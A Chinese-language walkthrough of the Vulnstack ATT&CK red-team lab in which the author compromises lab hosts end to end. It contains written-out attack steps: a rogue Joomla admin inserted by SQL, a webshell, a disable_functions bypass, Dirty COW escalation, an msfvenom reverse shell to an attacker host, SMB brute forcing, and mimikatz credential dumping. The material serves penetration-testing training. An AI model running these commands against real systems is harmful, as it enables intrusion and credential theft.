ATT&CK实战系列——红队实战（三）

1、环境搭建

靶机下载地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/5/

本次环境为黑盒测试，不提供虚拟机帐号密码，centos 出网机 ip 为 192.168.1.110，目标是域控内的一份重要文件。

全部主机解压后都是挂起状态，配好网络环境后运行五台机器便可。

 

2、漏洞利用

2.1修改模板getshell

出网机的 80 端口是一个 joomla! 搭建的网站

 

直接使用 kali 的 joomscan 工具扫描一下，发现版本为 3.9.12，后台登陆目录 http://192.168.1.110/administrator/，敏感文件泄露目录 http://192.168.1.110/configuration.php~

joomscan -u http://192.168.1.110/

 

获得一个 mysql 帐户 testuser/cvcvgjASD!@

 

nmap 扫描一下发现 3306 端口开放，使用得到的帐户密码远程登陆数据库。由于 joomla 能够在后台模板 getshell，因此尝试查找管理员的帐号密码登陆后台，可是数据表中存储的管理员密码是加密的，须要换一种思路。

 

根据 joomla 官方文档 https://docs.joomla.org/How_do_you_recover_or_reset_your_admin_password%3F/zh-cn 执行 sql 语句在数据库中添加 admin2/secret 超级管理员，注意 sql 语句修改成目标数据表的前缀。

INSERT INTO `am2zu_users`
   (`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`)
VALUES ('Administrator2', 'admin2',
 'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());
INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`)
VALUES (LAST_INSERT_ID(),'8');

 

执行语句后在数据表能够看到帐户已经成功添加了。

 

admin2/secret 登陆后台，Extensions->Templates->Templates->Beez3 Details and Files->New File 新建文件 shell.php，写入一句话木马。

 

 

蚁剑链接 webshell。

 

2.2bypass disable_functions

虚拟终端执行系统命令返回 ret=127，怀疑服务端 disable_functions 禁用了命令执行函数。

 

phpinfo 查看一下禁用了这些函数，尝试利用LD_PRELOAD绕过。

 

用蚁剑把 bypass_diablefunc.php 和 bypass_diablefunc_x64.so 上传到目标的同一目录，注意 .so 文件须要根据目标系统架构选择，而后访问 bypass_diablefunc.php，cmd 是执行的命令，outpath是读写权限的目录，sopath是 .so 文件的绝对路径。

工具下载地址： https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD

payload 以下：

http://192.168.1.110/templates/beez3/bypass_disablefunc.php?cmd=whoami&outpath=/tmp/baji&sopath=/var/www/html/templates/beez3/bypass_disablefunc_x64.so

 

查看当前 ip 为 192.168.93.120，内核是 ubuntu，说明真正的 web 服务后端在 ubuntu。

 

2.3敏感文件泄露

因为 ubuntu 内核比较新，暂时不考虑提权。翻找文件发现 test.txt 给出了一个用户的帐号密码。

 

能够成功登陆 centos 出网机。

 

3、内网渗透

3.1脏牛提权

拿到出网机后想继续横向移动，通常是在跳板机搭建 socks 代理，因此须要将 centos 提权，查看 centos 内核版本恰好在脏牛提权的范围内。

 

将 dirty.c 上传到 centos，gcc -pthread dirty.c -o dirty -lcrypt 命令编译生成 dirty 可执行文件，执行 ./dirty password 提权，exp 下载地址：https://github.com/FireFart/dirtycow

 

切换 firefart/baji 用户，成功提权。

 

3.2msf上线

攻击机生成 shell.elf，设置监听，将 elf 文件上传至 centos，执行后攻击机成功得到一个 meterpreter。

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=4444 -f elf > shell.elf

 

3.3存活主机探测

由于 bypass disable_functions 后获得 ubuntu ip 为 192.168.93.120，因此添加路由，meterpreter 放在后台，进行存活主机探测。

run autoroute -s 192.168.93.0/24
background
use auxiliary/scanner/smb/smb_version
set rhosts 192.168.93.0/24
exploit

 

获得了三台加入TEST域的 windows 主机

• 192.168.93.10 windows 2012
• 192.168.93.20 windows 2008
• 192.168.93.30 windows 7

 

 

尝试爆破 windows 2008 的本地管理员，参考其余师傅的文章爆出来密码为 123qwe!ASD（我没有包括这个密码的字典...）

use auxiliary/scanner/smb/smb_login
set rhosts 192.168.93.20
set SMBUser administrator
set PASS_FILE /usr/share/wordlists/top1000.txt
run

 

3.4内网信息搜集

在爆破密码成功的基础上，使用 msf 开个 socks4 正向代理，配合 proxychains。

use auxiliary/server/socks4a
set srvport 1080
exploit

 

wmi 出如今全部的 windows 操做系统中，由一组强大的工具集合组成，用于管理本地或远程的 windows 系统。攻击者使用 wmi 攻击时 windows 系统默认不会在日志中记录这些操做，能够作到无日志、攻击脚本无需写入到磁盘，增长了隐蔽性。

wmiexec 执行命令，搜集信息，wmiexec.py 下载地址 https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py

proxychains python3 wmiexec.py -debug 'administrator:123qwe!ASD@192.168.93.20'

 

ipconfig /all 知道 dns 服务器即域控是 192.168.93.10。那么基本的内网拓扑也清楚了，一台 centos 反向代理了一个 web，centos 有两个网卡，web 服务后端在 ubuntu 上，三台 windows 组成域环境，ip 分别是 192.168.93.10，192.168.93.20，192.168.93.30，域控为 windows server 2012，ip 为 192.168.93.10。

（反向代理服务器位于用户与目标服务器之间，可是对于用户而言，反向代理服务器就至关于目标服务器，即用户直接访问反向代理服务器就能够得到目标服务器的资源。反向代理的工做原理是，代理服务器来接受客户端的网络访问链接请求，而后服务器将请求有策略的转发给网络中实际工做的业务服务器，并将从业务服务器处理的结果，返回给网络上发起链接请求的客户端。更多解释 https://www.zhihu.com/question/36412304

反向代理优势：

• 提升了内部服务器的安全
• 加快了对内部服务器的访问速度
• 节约了有限的IP资源

）

 

tasklist /V 查看进程（显示对应用户），发现TEST域进程，能够尝试抓密码。

 

3.5mimikatz获取帐号密码

kali 使用 smbclient 经过代理链接 windows server 2008 上传 mimikatz。下载地址 https://github.com/gentilkiwi/mimikatz/releases

proxychains smbclient //192.168.93.20/C$ -U administrator
put mimikatz.exe

 

wmiexec 远程执行 mimikatz 成功获得域管理员密码。

mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" "exit" > log.log

 

3.6ipc远程链接

IPC$（Internet Process Connection）是共享“命名管道”的资源，它是为了让进程间通讯而开放的命名管道，能够经过验证用户名和密码得到相应的权限，在远程管理计算机和查看计算机的共享资源时使用。利用IPC$链接者能够与目标主机创建一个链接，获得目标主机上的目录结构、用户列表等信息。

利用条件：

1. 管理员开启了默认共享
2. 139或445端口开放

 

ipc 远程链接读 flag.txt。

net use \\192.168.93.10\admin$ zxcASDqw123!! /user:test\administrator   #系统默认路径c:\windows\下
dir \\192.168.93.10\C$\users\administrator\Documents
type \\192.168.93.10\C$\users\administrator\Documents\flag.txt

 

4、总结

经过这个靶机了解了一些新知识，实验了几个据说过可是还没试过的经典操做。若是有问题欢迎师傅们批评指正。

总结还想写一点点别的，如今是大三暑假，九月份就秋招了，喜欢渗透可是技术还挺菜的hhhh。但愿在毕业后能够作渗透测试的工做，很想很想喜欢的事能够成为工做啊：）

 

 

参考文章：

http://www.javashuo.com/article/p-xinhijkr-nk.html

https://www.freebuf.com/web/192052.html

https://glotozz.github.io/2020/05/19/vulstack-3/

https://xz.aliyun.com/t/6988